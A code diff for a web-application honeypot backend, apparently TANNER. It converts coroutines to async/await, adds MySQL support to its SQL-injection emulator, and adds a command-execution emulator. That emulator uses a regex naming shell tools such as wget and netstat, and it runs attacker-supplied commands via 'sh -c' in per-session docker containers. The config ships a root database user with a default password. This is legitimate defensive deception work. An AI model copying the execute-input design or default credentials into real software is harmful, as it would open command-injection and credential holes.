diff --git a/.travis.yml b/.travis.yml
index 36c7bac7..4da78c04 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,3 +1,6 @@
+sudo: required
+services:
+ - docker
language: python
python:
- "3.5"
diff --git a/README.md b/README.md
index df7296df..a3527376 100644
--- a/README.md
+++ b/README.md
@@ -31,8 +31,12 @@ Getting Started
1. For PHP Sandbox setup, see sandbox [manual] (https://github.com/mushorg/phpox)
2. In PHP Sandbox directory, run sandbox: ``sudo python3 sandbox.py``
+### Setup Docker
+1. Install [docker](https://docs.docker.com/engine/installation/linux/ubuntu/)
+2. Pull the required image to use [default: ``busybox:latest``]
+
### Setup and run TANNER
diff --git a/bin/tanner b/bin/tanner
index 24ad4c46..8c8b6bef 100644
--- a/bin/tanner
+++ b/bin/tanner
@@ -28,7 +28,8 @@ def main():
print("Error logs will be stored in", error_log_file_name)
if TannerConfig.get('LOCALLOG', 'enabled') == 'True':
print("Data logs will be stored in", TannerConfig.get('LOCALLOG', 'PATH'))
- tanner.server.run_server()
+ tanner = server.TannerServer()
+ tanner.start()
if __name__ == "__main__":
diff --git a/docs/source/config.rst b/docs/source/config.rst
index 1895fab8..ed4e6f75 100644
--- a/docs/source/config.rst
+++ b/docs/source/config.rst
@@ -23,8 +23,16 @@ There are 8 different sections :
:root_dir: The root directory for emulators that need data storing such as SQLI and LFI. Data will be stored in this directory
* **SQLI**
-
+
:db_name: THe name of database used in SQLI emulator
+    :type: Supports two types: MySQL/SQLITE
+ :db_name: The name of database used in SQLI emulator
+ :host: This will be used for MySQL to get the host address
+ :user: This is the MySQL user which perform DB queries
+ :password: The password corresponding to the above user
+ * **CMD_EXEC**
+
+    :host_image: The docker image used to emulate commands in the Command Execution Emulator
* **LOGGER**
:log_file: Location of tanner log file
@@ -47,7 +55,8 @@ If no file is specified, following json will be used as default:
'TANNER': {'host': '0.0.0.0', 'port': 8090},
'REDIS': {'host': 'localhost', 'port': 6379, 'poolsize': 80, 'timeout': 1},
'EMULATORS': {'root_dir': '/opt/tanner'},
- 'SQLI': {'db_name': 'tanner.db'},
+ 'SQLI': {'type':'SQLITE', 'db_name': 'tanner_db', 'host':'localhost', 'user':'root', 'password':'user_pass'},
+ 'CMD_EXEC': {'host_image': 'busybox:latest'},
'LOGGER': {'log_file': '/opt/tanner/tanner.log'},
'MONGO': {'enabled': 'False', 'URI': 'mongodb://localhost'},
'LOCALLOG': {'enabled': 'False', 'PATH': '/tmp/tanner_report.json'}
diff --git a/docs/source/emulators.rst b/docs/source/emulators.rst
index ecb58727..7ef38c9f 100644
--- a/docs/source/emulators.rst
+++ b/docs/source/emulators.rst
@@ -81,6 +81,24 @@ It emulates `SQL injection`_ vulnerability. This attack is detected by ``libinje
The emulator copies the original database (see :doc:`db_setup` for more info about db) to a dummy database for every attacker.
It uses UUID of the session for the attacker's db name. Every query is executed on the attacker's db.
The emulator returns the result of the execution and the page where SNARE should show the result.
+It supports two types of DBs.
+* **SQLITE**
+ To enable it, set SQLI type to SQLITE in config
+* **MySQL**
+ To enable it, set SQLI type to MySQL in config and set other necessary fields - Host, User and Password
+
+Command Execution Emulator
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+It emulates the `Command Execution`_ vulnerability. This attack is detected with a pattern.
+
+::
+
+.*(alias|cat|cd|cp|echo|exec|find|for|grep|ifconfig|ls|man|mkdir|netstat|ping|ps|pwd|uname|wget|touch|while).*
+
+* Each param value is checked against the pattern and ``command`` is extracted.
+* The ``command`` is executed in a docker container safely.
+* Results from the container are injected into the index page.
.. _RFI: https://en.wikipedia.org/wiki/File_inclusion_vulnerability#Remote_File_Inclusion
@@ -88,4 +106,5 @@ The emulator returns the result of the execution and the page where SNARE should
.. _LFI: https://en.wikipedia.org/wiki/File_inclusion_vulnerability#Local_File_Inclusion
.. _XSS: https://en.wikipedia.org/wiki/Cross-site_scripting
.. _SQL injection: https://en.wikipedia.org/wiki/SQL_injection
+.. _Command Execution: https://www.owasp.org/index.php/Command_Injection
.. _manual: https://github.com/client9/libinjection/wiki/doc-sqli-python
\ No newline at end of file
diff --git a/requirements.txt b/requirements.txt
index caade11d..17cdf731 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -1,5 +1,7 @@
-aiohttp<2.0
-elizabeth
+aiohttp>=2.0
+aiomysql
+docker
+elizabeth==0.3.27
yarl
redis
asyncio_redis
diff --git a/tanner/api.py b/tanner/api.py
index 6f546026..948eb5ce 100644
--- a/tanner/api.py
+++ b/tanner/api.py
@@ -1,7 +1,5 @@
-import asyncio
import json
import logging
-from urllib.parse import urlparse, parse_qs
import asyncio_redis
@@ -10,34 +8,28 @@ class Api:
def __init__(self):
self.logger = logging.getLogger('tanner.api.Api')
- @asyncio.coroutine
- def handle_api_request(self, path, redis_client):
+ async def handle_api_request(self, query, params, redis_client):
result = None
- parsed_path = urlparse(path)
- query = parse_qs(parsed_path.query)
-
- if parsed_path.path.startswith('/api/stats') and not query:
- result = yield from self.return_stats(redis_client)
- elif parsed_path.path == '/api/stats' and 'uuid' in query:
- result = yield from self.return_uuid_stats(query['uuid'], redis_client, 50)
+ if query == 'stats' and not params:
+ result = await self.return_stats(redis_client)
+ elif query == 'stats' and 'uuid' in params:
+ result = await self.return_uuid_stats(params['uuid'], redis_client, 50)
return result
- @asyncio.coroutine
- def return_stats(self, redis_client):
+ async def return_stats(self, redis_client):
query_res = []
try:
- query_res = yield from redis_client.smembers('snare_ids')
- query_res = yield from query_res.asset()
+ query_res = await redis_client.smembers('snare_ids')
+ query_res = await query_res.asset()
except asyncio_redis.NotConnectedError as connection_error:
self.logger.error('Can not connect to redis %s', connection_error)
return list(query_res)
- @asyncio.coroutine
- def return_uuid_stats(self, uuid, redis_client, count=-1):
+ async def return_uuid_stats(self, uuid, redis_client, count=-1):
query_res = []
try:
- query_res = yield from redis_client.lrange_aslist(uuid[0], 0, count)
+ query_res = await redis_client.lrange_aslist(uuid, 0, count)
except asyncio_redis.NotConnectedError as connection_error:
self.logger.error('Can not connect to redis %s', connection_error)
else:
diff --git a/tanner/config.py b/tanner/config.py
index 33410f4f..bcf3307d 100644
--- a/tanner/config.py
+++ b/tanner/config.py
@@ -10,7 +10,8 @@
'TANNER': {'host': '0.0.0.0', 'port': 8090},
'REDIS': {'host': 'localhost', 'port': 6379, 'poolsize': 80, 'timeout': 1},
'EMULATORS': {'root_dir': '/opt/tanner'},
- 'SQLI': {'db_name': 'tanner.db'},
+ 'SQLI': {'type':'SQLITE', 'db_name': 'tanner_db', 'host':'localhost', 'user':'root', 'password':'user_pass'},
+ 'CMD_EXEC': {'host_image': 'busybox:latest'},
'LOGGER': {'log_debug': '/opt/tanner/tanner.log', 'log_err': '/opt/tanner/tanner.err'},
'MONGO': {'enabled': 'False', 'URI': 'mongodb://localhost'},
'LOCALLOG': {'enabled': 'False', 'PATH': '/tmp/tanner_report.json'},
diff --git a/tanner/dorks_manager.py b/tanner/dorks_manager.py
index e550af89..4b388aba 100644
--- a/tanner/dorks_manager.py
+++ b/tanner/dorks_manager.py
@@ -1,16 +1,16 @@
-import asyncio
import logging
+import math
import os
import pickle
import random
import re
import uuid
-import math
import asyncio_redis
-from tanner.utils import patterns
from tanner import config
+from tanner.utils import patterns
+
class DorksManager:
dorks_key = uuid.uuid3(uuid.NAMESPACE_DNS, 'dorks').hex
@@ -21,8 +21,7 @@ def __init__(self):
self.init_done = False
@staticmethod
- @asyncio.coroutine
- def push_init_dorks(file_name, redis_key, redis_client):
+ async def push_init_dorks(file_name, redis_key, redis_client):
dorks = None
if os.path.exists(file_name):
with open(file_name, 'rb') as dorks_file:
@@ -32,57 +31,54 @@ def push_init_dorks(file_name, redis_key, redis_client):
dorks = dorks.split()
if isinstance(dorks, set):
dorks = [x for x in dorks if x is not None]
- yield from redis_client.sadd(redis_key, dorks)
+ await redis_client.sadd(redis_key, dorks)
- @asyncio.coroutine
- def extract_path(self, path, redis_client):
+ async def extract_path(self, path, redis_client):
extracted = re.match(patterns.QUERY, path)
if extracted:
extracted = extracted.group(0)
-
try:
- yield from redis_client.sadd(self.user_dorks_key, [extracted])
+ await redis_client.sadd(self.user_dorks_key, [extracted])
except asyncio_redis.NotConnectedError as connection_error:
- self.logger('Problem with redis connection: %s', connection_error)
+ self.logger.error('Problem with redis connection: %s', connection_error)
- @asyncio.coroutine
- def init_dorks(self, redis_client):
+ async def init_dorks(self, redis_client):
try:
- transaction = yield from redis_client.multi()
- dorks_exist = yield from transaction.exists(self.dorks_key)
- user_dorks_exist = yield from transaction.exists(self.user_dorks_key)
+ transaction = await redis_client.multi()
+ dorks_exist = await transaction.exists(self.dorks_key)
+ user_dorks_exist = await transaction.exists(self.user_dorks_key)
- yield from transaction.exec()
+ await transaction.exec()
except (asyncio_redis.TransactionError, asyncio_redis.NotConnectedError) as redis_error:
- self.logger('Problem with transaction: %s', redis_error)
+ self.logger.error('Problem with transaction: %s', redis_error)
else:
- dorks_existed = yield from dorks_exist
- user_dorks_existed = yield from user_dorks_exist
+ dorks_existed = await dorks_exist
+ user_dorks_existed = await user_dorks_exist
if not dorks_existed:
- yield from self.push_init_dorks(config.TannerConfig.get('DATA', 'dorks'), self.dorks_key, redis_client)
+ await self.push_init_dorks(config.TannerConfig.get('DATA', 'dorks'), self.dorks_key, redis_client)
if not user_dorks_existed:
- yield from self.push_init_dorks(config.TannerConfig.get('DATA', 'user_dorks'), self.user_dorks_key, redis_client)
+ await self.push_init_dorks(config.TannerConfig.get('DATA', 'user_dorks'), self.user_dorks_key,
+ redis_client)
self.init_done = True
- @asyncio.coroutine
- def choose_dorks(self, redis_client):
+ async def choose_dorks(self, redis_client):
if not self.init_done:
- yield from self.init_dorks(redis_client)
+ await self.init_dorks(redis_client)
chosen_dorks = []
max_dorks = 50
try:
- transaction = yield from redis_client.multi()
- dorks = yield from transaction.smembers_asset(self.dorks_key)
- user_dorks = yield from transaction.smembers_asset(self.user_dorks_key)
+ transaction = await redis_client.multi()
+ dorks = await transaction.smembers_asset(self.dorks_key)
+ user_dorks = await transaction.smembers_asset(self.user_dorks_key)
- yield from transaction.exec()
+ await transaction.exec()
except (asyncio_redis.TransactionError, asyncio_redis.NotConnectedError) as redis_error:
- self.logger('Problem with transaction: %s', redis_error)
+ self.logger.error('Problem with transaction: %s', redis_error)
else:
- dorks = yield from dorks
- user_dorks = yield from user_dorks
+ dorks = await dorks
+ user_dorks = await user_dorks
chosen_dorks.extend(random.sample(dorks, random.randint(math.floor(0.5 * max_dorks), max_dorks)))
try:
if max_dorks > len(user_dorks):
diff --git a/tanner/emulators/base.py b/tanner/emulators/base.py
index 3b736e76..d0ebcf83 100644
--- a/tanner/emulators/base.py
+++ b/tanner/emulators/base.py
@@ -3,7 +3,7 @@
import urllib.parse
import yarl
-from tanner.emulators import lfi, rfi, sqli, xss
+from tanner.emulators import lfi, rfi, sqli, xss, cmd_exec
from tanner.utils import patterns
@@ -15,29 +15,34 @@ class BaseHandler:
patterns.XSS_ATTACK: dict(name='xss', order=3)
}
- def __init__(self, base_dir, db_name):
+ def __init__(self, base_dir, db_name, loop=None):
self.emulators = {
- 'rfi': rfi.RfiEmulator(base_dir),
+ 'rfi': rfi.RfiEmulator(base_dir, loop),
'lfi': lfi.LfiEmulator(base_dir),
'xss': xss.XssEmulator(),
- 'sqli': sqli.SqliEmulator(db_name, base_dir)
+ 'sqli': sqli.SqliEmulator(db_name, base_dir),
+ 'cmd_exec': cmd_exec.CmdExecEmulator()
}
- @asyncio.coroutine
- def handle_post(self, session, data):
+ async def handle_post(self, session, data):
detection = dict(name='unknown', order=0)
- xss_result = yield from self.emulators['xss'].handle(None, session, data)
+ xss_result = await self.emulators['xss'].handle(None, session, data)
if xss_result:
detection = {'name': 'xss', 'order': 2, 'payload': xss_result}
else:
- sqli_data = yield from self.emulators['sqli'].check_post_data(data)
+ sqli_data = self.emulators['sqli'].check_post_data(data)
if sqli_data:
- sqli_result = yield from self.emulators['sqli'].handle(sqli_data, session, 1)
+ sqli_result = await self.emulators['sqli'].handle(sqli_data, session, 1)
detection = {'name': 'sqli', 'order': 2, 'payload': sqli_result}
+ else:
+ cmd_exec_data = await self.emulators['cmd_exec'].check_post_data(data)
+ if cmd_exec_data:
+ cmd_exec_results = await self.emulators['cmd_exec'].handle(cmd_exec_data[0][1], session)
+ detection = {'name': 'cmd_exec', 'order': 3, 'payload': cmd_exec_results}
+
return detection
- @asyncio.coroutine
- def handle_get(self, session, path):
+ async def handle_get(self, session, path):
detection = dict(name='unknown', order=0)
# dummy for wp-content
if re.match(patterns.WORD_PRESS_CONTENT, path):
@@ -56,27 +61,30 @@ def handle_get(self, session, path):
attack_value = value
if detection['order'] <= 1:
- sqli = yield from self.emulators['sqli'].check_get_data(path)
- if sqli:
- detection = {'name': 'sqli', 'order': 2}
- attack_value = path
+ cmd_exec = await self.emulators['cmd_exec'].check_get_data(path)
+ if cmd_exec:
+ detection = {'name': 'cmd_exec', 'order': 3}
+ attack_value = cmd_exec[0][1]
+ else:
+ sqli = self.emulators['sqli'].check_get_data(path)
+ if sqli:
+ detection = {'name': 'sqli', 'order': 2}
+ attack_value = path
if detection['name'] in self.emulators:
- emulation_result = yield from self.emulators[detection['name']].handle(attack_value, session)
+ emulation_result = await self.emulators[detection['name']].handle(attack_value, session)
detection['payload'] = emulation_result
return detection
- @asyncio.coroutine
- def emulate(self, data, session, path):
+ async def emulate(self, data, session, path):
if data['method'] == 'POST':
- detection = yield from self.handle_post(session, data)
+ detection = await self.handle_post(session, data)
else:
- detection = yield from self.handle_get(session, path)
+ detection = await self.handle_get(session, path)
return detection
- @asyncio.coroutine
- def handle(self, data, session, path):
- detection = yield from self.emulate(data, session, path)
+ async def handle(self, data, session, path):
+ detection = await self.emulate(data, session, path)
return detection
diff --git a/tanner/emulators/cmd_exec.py b/tanner/emulators/cmd_exec.py
new file mode 100644
index 00000000..c6634f96
--- /dev/null
+++ b/tanner/emulators/cmd_exec.py
@@ -0,0 +1,93 @@
+import asyncio
+import docker
+import yarl
+# TODO : Replace docker with aiodocker
+import logging
+
+from tanner.config import TannerConfig
+from tanner.utils import patterns
+
+class CmdExecEmulator:
+ def __init__(self):
+ try:
+ self.docker_client = docker.from_env(version='auto')
+ except docker.errors as docker_error:
+ self.logger.error('Error while connecting to docker service %s', docker_error)
+ self.host_image = TannerConfig.get('CMD_EXEC', 'host_image')
+ self.logger = logging.getLogger('tanner.cmd_exec_emulator.CmdExecEmulator')
+
+ async def setup_host_image(self):
+ try:
+ if not self.docker_client.images.list(self.host_image):
+ self.docker_client.images.pull(self.host_image)
+ except docker.errors as docker_error:
+ self.logger.error('Error while pulling %s image %s', self.host_image, docker_error)
+
+ async def get_container(self, container_name):
+ container = None
+ try:
+ container_if_exists = self.docker_client.containers.list(all= True,
+ filters= dict(name= container_name)
+ )
+ if container_if_exists:
+ container = container_if_exists[0]
+ except docker.errors.APIError as server_error:
+ self.logger.error('Error while fetching container list %s', server_error)
+ return container
+
+ async def create_attacker_env(self, session):
+ await self.setup_host_image()
+ container_name = 'attacker_' + session.sess_uuid.hex
+ container = await self.get_container(container_name)
+ if not container:
+ try:
+ container = self.docker_client.containers.create(image= self.host_image,
+ stdin_open= True,
+ name= container_name
+ )
+ session.associate_env(container_name)
+ except docker.errors as docker_error:
+ self.logger.error('Error while creating a container %s', docker_error)
+ return container
+
+ async def get_cmd_exec_results(self, container, cmd):
+ execute_result = None
+ try:
+ container.start()
+ execute_result = container.exec_run(['sh', '-c', cmd]).decode('utf-8')
+ container.kill()
+ except docker.errors.APIError as server_error:
+ self.logger.error('Error while executing command %s in container %s', cmd, server_error)
+ result = dict(value= execute_result, page= '/index.html')
+ return result
+
+ async def delete_env(self, container_name):
+ container = await self.get_container(container_name)
+ try:
+ if container:
+ container.remove(force = True)
+ except docker.errors.APIError as server_error:
+ self.logger.error('Error while removing container %s', server_error)
+
+ async def check_post_data(self, data):
+ cmd_data = []
+ for (param_id, param_value) in data['post_data'].items():
+ if patterns.CMD_ATTACK.match(param_value):
+ cmd_data.append((param_id, param_value))
+ return cmd_data
+
+ async def check_get_data(self, path):
+ cmd_data = []
+ query = yarl.URL(path).query_string
+ params = query.split('&')
+ for param in params:
+ if len(param.split('=')) == 2:
+ param_id, param_value = param.split('=')
+ if patterns.CMD_ATTACK.match(param_value):
+ cmd_data.append((param_id, param_value))
+ return cmd_data
+
+ async def handle(self, value, session= None):
+ container = await self.create_attacker_env(session)
+ result = await self.get_cmd_exec_results(container, value)
+ return result
\ No newline at end of file
diff --git a/tanner/emulators/lfi.py b/tanner/emulators/lfi.py
index 2860f46f..9a154327 100644
--- a/tanner/emulators/lfi.py
+++ b/tanner/emulators/lfi.py
@@ -13,13 +13,11 @@ def __init__(self, root_path):
self.whitelist = []
self.setup_or_update_vdocs()
- @asyncio.coroutine
def available_files(self):
for root, dirs, files in os.walk(self.vdoc_path):
for filename in files:
self.whitelist.append(os.path.join(root, filename))
- @asyncio.coroutine
def get_lfi_result(self, file_path):
result = None
if file_path in self.whitelist:
@@ -27,7 +25,6 @@ def get_lfi_result(self, file_path):
result = lfile.read()
return result
- @asyncio.coroutine
def get_file_path(self, path):
file_match = re.match(patterns.LFI_FILEPATH, path)
if file_match:
@@ -43,20 +40,20 @@ def setup_or_update_vdocs(self):
os.makedirs(self.vdoc_path)
with open(config.TannerConfig.get('DATA', 'vdocs')) as vdf:
- vdocs = json.load(vdf)
+ vdocs = json.load(vdf)
if vdocs:
for key, value in vdocs.items():
filename = os.path.join(self.vdoc_path, key)
if not os.path.exists(filename):
- os.makedirs(os.path.dirname(filename), exist_ok=True)
- with open(filename, 'w') as vd:
- vd.write(value)
+ os.makedirs(os.path.dirname(filename), exist_ok=True)
+ with open(filename, 'w') as vd:
+ vd.write(value)
- @asyncio.coroutine
- def handle(self, path, session=None):
+
+ async def handle(self, path, session=None):
if not self.whitelist:
- yield from self.available_files()
- file_path = yield from self.get_file_path(path)
- result = yield from self.get_lfi_result(file_path)
+ self.available_files()
+ file_path = self.get_file_path(path)
+ result = self.get_lfi_result(file_path)
return result
diff --git a/tanner/emulators/mysqli.py b/tanner/emulators/mysqli.py
new file mode 100644
index 00000000..bf55ca84
--- /dev/null
+++ b/tanner/emulators/mysqli.py
@@ -0,0 +1,39 @@
+import asyncio
+
+from tanner.utils import mysql_db_helper
+from tanner import config
+
+
+class MySQLIEmulator:
+ def __init__(self, db_name):
+ self.db_name = db_name
+ self.helper = mysql_db_helper.MySQLDBHelper()
+
+ async def setup_db(self, query_map):
+ db_exists = await self.helper.check_db_exists(self.db_name)
+ if not db_exists:
+ await self.helper.setup_db_from_config(self.db_name)
+ query_map = await self.helper.create_query_map(self.db_name)
+ return query_map
+
+ async def create_attacker_db(self, session):
+ attacker_db_name = 'attacker_' + session.sess_uuid.hex
+ attacker_db = await self.helper.copy_db(self.db_name,
+ attacker_db_name
+ )
+ session.associate_db(attacker_db)
+ return attacker_db
+
+ async def execute_query(self, query, db_name):
+ result = []
+ conn = await self.helper.connect_to_db()
+ cursor = await conn.cursor()
+ await cursor.execute('USE {db_name}'.format(db_name=db_name))
+ try:
+ await cursor.execute(query)
+ rows = await cursor.fetchall()
+ for row in rows:
+ result.append(list(row))
+ except Exception as mysql_error:
+ result = str(mysql_error)
+ return result
\ No newline at end of file
diff --git a/tanner/emulators/rfi.py b/tanner/emulators/rfi.py
index d772a24a..1fa95487 100644
--- a/tanner/emulators/rfi.py
+++ b/tanner/emulators/rfi.py
@@ -1,24 +1,25 @@
import asyncio
+import ftplib
import hashlib
import logging
import os
import re
import time
-import ftplib
from concurrent.futures import ThreadPoolExecutor
import aiohttp
import yarl
+
from tanner.utils import patterns
class RfiEmulator:
- def __init__(self, root_dir):
+ def __init__(self, root_dir, loop=None):
+ self._loop = loop if loop is not None else asyncio.get_event_loop()
self.script_dir = os.path.join(root_dir, 'files')
self.logger = logging.getLogger('tanner.rfi_emulator.RfiEmulator')
- @asyncio.coroutine
- def download_file(self, path):
+ async def download_file(self, path):
file_name = None
url = re.match(patterns.REMOTE_FILE_URL, path)
@@ -32,20 +33,19 @@ def download_file(self, path):
if url.scheme == "ftp":
pool = ThreadPoolExecutor()
- loop = asyncio.get_event_loop()
- ftp_future = loop.run_in_executor(pool, self.download_file_ftp, url)
- file_name = yield from ftp_future
+ ftp_future = self._loop.run_in_executor(pool, self.download_file_ftp, url)
+ file_name = await ftp_future
else:
try:
- with aiohttp.ClientSession() as client:
- resp = yield from client.get(url)
- data = yield from resp.text()
+ with aiohttp.ClientSession(loop=self._loop) as client:
+ resp = await client.get(url)
+ data = await resp.text()
except aiohttp.ClientError as client_error:
self.logger.error('Error during downloading the rfi script %s', client_error)
else:
- yield from resp.release()
- yield from client.close()
+ await resp.release()
+ await client.close()
tmp_filename = url.name + str(time.time())
file_name = hashlib.md5(tmp_filename.encode('utf-8')).hexdigest()
with open(os.path.join(self.script_dir, file_name), 'bw') as rfile:
@@ -70,29 +70,28 @@ def download_file_ftp(self, url):
else:
return file_name
- @asyncio.coroutine
- def get_rfi_result(self, path):
+ async def get_rfi_result(self, path):
rfi_result = None
- yield from asyncio.sleep(1)
- file_name = yield from self.download_file(path)
+ await asyncio.sleep(1, loop=self._loop)
+ file_name = await self.download_file(path)
if file_name is None:
return rfi_result
with open(os.path.join(self.script_dir, file_name), 'br') as script:
script_data = script.read()
try:
- with aiohttp.ClientSession() as session:
- resp = yield from session.post('http://127.0.0.1:8088/', data=script_data)
- rfi_result = yield from resp.json()
+ with aiohttp.ClientSession(loop=self._loop) as session:
+
+ resp = await session.post('http://127.0.0.1:8088/', data=script_data)
+ rfi_result = await resp.json()
except aiohttp.ClientError as client_error:
self.logger.error('Error during connection to php sandbox %s', client_error)
else:
- yield from resp.release()
- yield from session.close()
+ await resp.release()
+ await session.close()
return rfi_result
- @asyncio.coroutine
- def handle(self, path, session=None):
- result = yield from self.get_rfi_result(path)
+ async def handle(self, path, session=None):
+ result = await self.get_rfi_result(path)
if not result or 'stdout' not in result:
return ''
else:
diff --git a/tanner/emulators/sqli.py b/tanner/emulators/sqli.py
index a2d085b7..43534ac6 100644
--- a/tanner/emulators/sqli.py
+++ b/tanner/emulators/sqli.py
@@ -1,30 +1,20 @@
-import asyncio
import os
+import pylibinjection
import sqlite3
import urllib.parse
-import pylibinjection
-from asyncio.subprocess import PIPE
-
-from tanner.utils import db_helper
-from tanner import config
+from tanner.utils import sqlite_db_helper
+from tanner.config import TannerConfig
+from tanner.emulators import mysqli, sqlite
class SqliEmulator:
def __init__(self, db_name, working_dir):
- self.db_name = db_name
- self.working_dir = os.path.join(working_dir, 'db/')
- self.helper = db_helper.DBHelper()
- self.query_map = None
+ if (TannerConfig.get('SQLI', 'type') == 'MySQL'):
+ self.sqli_emulator = mysqli.MySQLIEmulator(db_name)
+ else:
+ self.sqli_emulator = sqlite.SQLITEEmulator(db_name, working_dir)
- @asyncio.coroutine
- def setup_db(self):
- if not os.path.exists(self.working_dir):
- os.makedirs(self.working_dir)
- db = os.path.join(self.working_dir, self.db_name)
- if not os.path.exists(db):
- yield from self.helper.setup_db_from_config(self.working_dir, self.db_name)
- if self.query_map is None:
- self.query_map = yield from self.helper.create_query_map(self.working_dir, self.db_name)
+ self.query_map = None
@staticmethod
def check_sqli(path):
@@ -32,7 +22,6 @@ def check_sqli(path):
sqli = pylibinjection.detect_sqli(payload)
return int(sqli['sqli'])
- @asyncio.coroutine
def check_post_data(self, data):
sqli_data = []
for (param, value) in data['post_data'].items():
@@ -41,7 +30,6 @@ def check_post_data(self, data):
sqli_data.append((param, value))
return sqli_data
- @asyncio.coroutine
def check_get_data(self, path):
request_query = urllib.parse.urlparse(path).query
parsed_queries = urllib.parse.parse_qsl(request_query)
@@ -49,23 +37,12 @@ def check_get_data(self, path):
sqli = self.check_sqli(query[1])
return sqli
- @asyncio.coroutine
- def create_attacker_db(self, session):
- attacker_db_name = session.sess_uuid.hex + '.db'
- attacker_db = yield from self.helper.copy_db(self.db_name,
- attacker_db_name,
- self.working_dir
- )
- session.associate_db(attacker_db)
- return attacker_db
-
@staticmethod
def prepare_get_query(path):
query = urllib.parse.urlparse(path).query
parsed_query = urllib.parse.parse_qsl(query)
return parsed_query
- @asyncio.coroutine
def map_query(self, query):
db_query = None
param = query[0][0]
@@ -84,37 +61,24 @@ def map_query(self, query):
return db_query
- @staticmethod
- def execute_query(query, db):
- result = []
- conn = sqlite3.connect(db)
- cursor = conn.cursor()
- try:
- for row in cursor.execute(query):
- result.append(list(row))
- except sqlite3.OperationalError as sqlite_error:
- result = str(sqlite_error)
- return result
-
- @asyncio.coroutine
- def get_sqli_result(self, query, attacker_db):
- db_query = yield from self.map_query(query)
+ async def get_sqli_result(self, query, attacker_db):
+ db_query = self.map_query(query)
if db_query is None:
result = 'You have an error in your SQL syntax; check the manual\
that corresponds to your MySQL server version for the\
right syntax to use near {} at line 1'.format(query[0][0])
else:
- execute_result = self.execute_query(db_query, attacker_db)
+ execute_result = await self.sqli_emulator.execute_query(db_query, attacker_db)
if isinstance(execute_result, list):
execute_result = ' '.join([str(x) for x in execute_result])
result = dict(value=execute_result, page='/index.html')
return result
- @asyncio.coroutine
- def handle(self, path, session, post_request=0):
- yield from self.setup_db()
+ async def handle(self, path, session, post_request=0):
+ if self.query_map is None:
+ self.query_map = await self.sqli_emulator.setup_db(self.query_map)
if not post_request:
path = self.prepare_get_query(path)
- attacker_db = yield from self.create_attacker_db(session)
- result = yield from self.get_sqli_result(path, attacker_db)
+ attacker_db = await self.sqli_emulator.create_attacker_db(session)
+ result = await self.get_sqli_result(path, attacker_db)
return result
diff --git a/tanner/emulators/sqlite.py b/tanner/emulators/sqlite.py
new file mode 100644
index 00000000..73387a8e
--- /dev/null
+++ b/tanner/emulators/sqlite.py
@@ -0,0 +1,42 @@
+import asyncio
+import os
+import sqlite3
+
+from tanner.utils import sqlite_db_helper
+from tanner import config
+
+
+class SQLITEEmulator:
+ def __init__(self, db_name, working_dir):
+ self.db_name = db_name
+ self.working_dir = os.path.join(working_dir, 'db/')
+ self.helper = sqlite_db_helper.SQLITEDBHelper()
+
+ async def setup_db(self, query_map):
+ if not os.path.exists(self.working_dir):
+ os.makedirs(self.working_dir)
+ db = os.path.join(self.working_dir, self.db_name)
+ if not os.path.exists(db):
+ await self.helper.setup_db_from_config(self.working_dir, self.db_name)
+ query_map = self.helper.create_query_map(self.working_dir, self.db_name)
+ return query_map
+
+ async def create_attacker_db(self, session):
+ attacker_db_name = 'attacker_' + session.sess_uuid.hex
+ attacker_db = self.helper.copy_db(self.db_name,
+ attacker_db_name,
+ self.working_dir
+ )
+ session.associate_db(attacker_db)
+ return attacker_db
+
+ async def execute_query(self, query, db):
+ result = []
+ conn = sqlite3.connect(db)
+ cursor = conn.cursor()
+ try:
+ for row in cursor.execute(query):
+ result.append(list(row))
+ except sqlite3.OperationalError as sqlite_error:
+ result = str(sqlite_error)
+ return result
\ No newline at end of file
diff --git a/tanner/emulators/xss.py b/tanner/emulators/xss.py
index b6f56c2d..c6efd323 100644
--- a/tanner/emulators/xss.py
+++ b/tanner/emulators/xss.py
@@ -1,4 +1,3 @@
-import asyncio
import mimetypes
import re
import urllib.parse
@@ -8,7 +7,6 @@
class XssEmulator:
@staticmethod
- @asyncio.coroutine
def extract_xss_data(data):
value = ''
if 'post_data' in data:
@@ -19,12 +17,11 @@ def extract_xss_data(data):
value += val if not value else '\n' + val
return value
- @asyncio.coroutine
def get_xss_result(self, session, val):
result = None
injectable_page = None
if session:
- injectable_page = yield from self.set_xss_page(session)
+ injectable_page = self.set_xss_page(session)
if injectable_page is None:
injectable_page = '/index.html'
if val:
@@ -33,7 +30,6 @@ def get_xss_result(self, session, val):
return result
@staticmethod
- @asyncio.coroutine
def set_xss_page(session):
injectable_page = None
for page in reversed(session.paths):
@@ -41,10 +37,9 @@ def set_xss_page(session):
injectable_page = page['path']
return injectable_page
- @asyncio.coroutine
- def handle(self, value, session, raw_data=None):
+ async def handle(self, value, session, raw_data=None):
xss_result = None
if not value:
- value = yield from self.extract_xss_data(raw_data)
- xss_result = yield from self.get_xss_result(session, value)
+ value = self.extract_xss_data(raw_data)
+ xss_result = self.get_xss_result(session, value)
return xss_result
diff --git a/tanner/redis_client.py b/tanner/redis_client.py
new file mode 100644
index 00000000..cff11085
--- /dev/null
+++ b/tanner/redis_client.py
@@ -0,0 +1,25 @@
+import asyncio
+import logging
+
+import asyncio_redis
+
+from tanner.config import TannerConfig
+
+LOGGER = logging.getLogger(__name__)
+
+
+class RedisClient:
+ @staticmethod
+ async def get_redis_client():
+ redis_client = None
+ try:
+ host = TannerConfig.get('REDIS', 'host')
+ port = TannerConfig.get('REDIS', 'port')
+ poolsize = TannerConfig.get('REDIS', 'poolsize')
+ timeout = TannerConfig.get('REDIS', 'timeout')
+ redis_client = await asyncio.wait_for(asyncio_redis.Pool.create(
+ host=host, port=int(port), poolsize=int(poolsize)), timeout=int(timeout))
+ except asyncio.TimeoutError as timeout_error:
+ LOGGER.error('Problem with redis connection. Please, check your redis server. %s', timeout_error)
+ exit()
+ return redis_client
\ No newline at end of file
diff --git a/tanner/server.py b/tanner/server.py
index 2d9c0cbc..99815b2a 100644
--- a/tanner/server.py
+++ b/tanner/server.py
@@ -1,141 +1,108 @@
-#!/usr/bin/python3
-
import asyncio
import json
import logging
-from urllib.parse import unquote
-import aiohttp
-import aiohttp.server
-import asyncio_redis
import uvloop
+import yarl
+from aiohttp import web
-from tanner import api, dorks_manager, session_manager, config
+from tanner import api, dorks_manager, session_manager, redis_client
+from tanner.config import TannerConfig
from tanner.emulators import base
from tanner.reporting.log_local import Reporting as local_report
from tanner.reporting.log_mongodb import Reporting as mongo_report
